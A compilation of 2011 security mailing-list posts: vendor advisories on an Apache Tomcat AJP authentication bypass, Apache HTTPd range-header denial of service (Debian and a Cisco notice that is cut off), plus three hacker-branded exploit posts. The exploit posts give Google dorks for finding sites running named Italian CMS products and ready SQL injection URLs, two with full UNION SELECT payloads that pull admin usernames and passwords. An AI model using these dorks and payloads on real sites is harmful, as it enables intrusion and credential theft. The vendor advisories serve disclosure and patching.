[SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure
CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.20 - Tomcat 6.0.0 to 6.0.33 - Tomcat 5.5.0 to 5.5.33 - Earlier, unsupported versions may also be affected Description: Apache Tomcat supports the AJP protocol which is used with reverse proxies to pass requests and associated data about the request from the reverse proxy to Tomcat. The AJP protocol is designed so that when a request includes a request body, an unsolicited AJP message is sent to Tomcat that includes the first part (or possibly all) of the request body. In certain circumstances, Tomcat did not process this message as a request body but as a new request. This permitted an attacker to have full control over the AJP message which allowed an attacker to (amongst other things): - insert the name of an authenticated user - insert any client IP address (potentially bypassing any client IP address filtering) - trigger the mixing of responses between users The following AJP connector implementations are not affected: org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default) The following AJP connector implementations are affected: org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default) org.apache.coyote.ajp.AjpNioProtocol (7.0.x) org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x) Further, this issue only applies if all of the following are are true for at least one resource: - POST requests are accepted - The request body is not processed Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698 Mitigation: Users of affected versions should apply one of the following mitigations: - Upgrade to a version of Apache Tomcat that includes a fix for this issue when available - Apply the appropriate patch - 7.0.x http://svn.apache.org/viewvc?rev=1162958view=rev - 6.0.x http://svn.apache.org/viewvc?rev=1162959view=rev - 5.5.x http://svn.apache.org/viewvc?rev=1162960view=rev - Configure the reverse proxy and Tomcat's AJP connector(s) to use the requiredSecret attribute - Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not available for Tomcat 7.0.x) Credit: The issue was reported via Apache Tomcat's public issue tracker. The Apache Tomcat security team strongly discourages reporting of undisclosed vulnerabilities via public channels. All Apache Tomcat security vulnerabilities should be reported to the private security team mailing list: secur...@tomcat.apache.org References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
[SECURITY] [DSA 2298-1] apache2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2298-1 secur...@debian.org http://www.debian.org/security/Stefan Fritsch August 29, 2011http://www.debian.org/security/faq - - Package: apache2 Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2010-1452 CVE-2011-3192 Two issues have been found in the Apache HTTPD web server: CVE-2011-3192 A vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server. This vulnerability allows an attacker to cause Apache HTTPD to use an excessive amount of memory, causing a denial of service. CVE-2010-1452 A vulnerability has been found in mod_dav that allows an attacker to cause a daemon crash, causing a denial of service. This issue only affects the Debian 5.0 oldstable/lenny distribution. For the oldstable distribution (lenny), these problems have been fixed in version 2.2.9-10+lenny10. For the stable distribution (squeeze), this problem has been fixed in version 2.2.16-6+squeeze2. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 2.2.19-2. We recommend that you upgrade your apache2 packages. This update also contains updated apache2-mpm-itk packages which have been recompiled against the updated apache2 packages. The new version number for the oldstable distribution is 2.2.6-02-1+lenny5. In the stable distribution, apache2-mpm-itk has the same version number as apache2. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOW/+Mbxelr8HyTqQRAn+CAJ9s4JT+blC4eMB2rKEB1dLjtiA1+wCgvJDp /oid/eRrQ5zmnSp+KQ0R+Cs= =Svdo -END PGP SIGNATURE-
bizConsulting (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## bizConsulting (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.bizconsulting.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by: bizConsulting inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=-1 union select concat(username,0x3a,password),2 from adm_amministratori # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Cisco Security Advisory: Apache HTTPd Range Header Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Apache HTTPd Range Header Denial of Service Vulnerability Advisory ID: cisco-sa-20110830-apache Revision 1.0 For Public Release 2011 August 30 1600 UTC (GMT) Summary === The Apache HTTPd server contains a denial of service vulnerability when it handles multiple, overlapping ranges. Multiple Cisco products may be affected by this vulnerability. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this Advisory: http://tools.cisco.com/security/center/viewAMBAlert.x?alertId=24024 This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110830-apache.shtml Affected Products = Cisco is currently evaluating products for possible exposure to this vulnerability. Products will only be listed in the Vulnerable Products or Products Confirmed Not Vulnerable sections of this security advisory when a final determination about exposure is made. Products that are not listed in either of these two sections are still being evaluated. Vulnerable Products +-- This section will be updated when more information is available. The following products are confirmed to be affected by this vulnerability: * Cisco MDS 9000 NX-OS Software releases prior to 4.2.x are affected. Cisco MDS 9000 NX-OS Software releases 4.2.x and later are not affected. * Cisco NX-OS Software for Cisco Nexus 7000 Series Switches releases prior to 4.2.x are affected. Cisco NX-OS Software for Cisco Nexus 7000 Series Switches versions 4.2.x and later are not affected. * Cisco TelePresence Video Communication Server (Cisco TelePresence VCS) * Cisco Video Surveillance Manager (VSM) * Cisco Video Surveillance Operations Manager (VSOM) * Cisco Wireless Control System (WCS) Products Confirmed Not Vulnerable + The following products are confirmed not vulnerable: * Cisco ASA 5500 Series Adaptive Security Appliances * Cisco Catalyst 6500 Series ASA Services Module * Cisco Catalyst 6500 Series Firewall Services Module * Cisco Fabric Manager * Cisco Identity Services Engine * Cisco Intercompany Media Engine * Cisco IOS Software * Cisco IOS XE Software * Cisco IOS XR Software * Cisco IP Interoperability and Collaboration System (IPICS) * Cisco Unified IP Phones * Cisco MDS 9000 NX-OS Software releases 4.2.x or later (prior versions are affected) * Cisco NX-OS Software for Nexus 7000 Series Switches releases 4.2.x or later (prior versions are affected) * Cisco Prime Central * Cisco Prime Optical * Cisco Prime Performance Manager * Cisco TelePresence Server * Cisco Unified Communications Manager (formerly Cisco CallManager) * Cisco Unity * Cisco Unity Connection * Cisco Wireless LAN Controllers (WLC) This section will be updated when more information is available. Details === The Apache HTTPd server contains a denial of service vulnerability when it handles multiple overlapping ranges. Multiple Cisco products may be affected by this vulnerability. The following Cisco bug IDs are being used to track potential exposure to this vulnerability. The following Cisco bug IDs do not confirm that a product is vulnerable; rather, the Cisco bug IDs indicate that the product is under investigation by the appropriate product teams. ++ | Cisco Product | Cisco bug ID | |+---| | Cisco ACE 4710 Appliance | CSCts35635 | |+---| | Cisco ACE Application Control Engine Module| CSCts35610 | |+---| | Cisco ACE GSS 4400 Series Global Site Selector (GSS) | CSCts33313 | |+---| | Cisco ACE XML Gateway | CSCts33321 | |+---| | Cisco Active Network Abstraction | CSCts33317 | |+---| | Cisco ASA 5500 Series Adaptive Security Appliances | CSCts33180 | |+---| | Cisco CNS Network Registrar| CSCts36064
webyuss (prodotto.php?id) (quadri.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## webyuss (prodotto.php?id) (quadri.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.webyuss.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by webyuss inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=[SQL] Dork : Powered by webyuss inurl:quadri.php?id= Exploite: www.victim.com/quadri.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Pc Web Agency (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Pc Web Agency (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.pcwebagency.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Pc Web Agency inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=-Null union select 1,user,pswd,4,5,6,7,8,9,10,11,12,13,14,15,16 from login # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
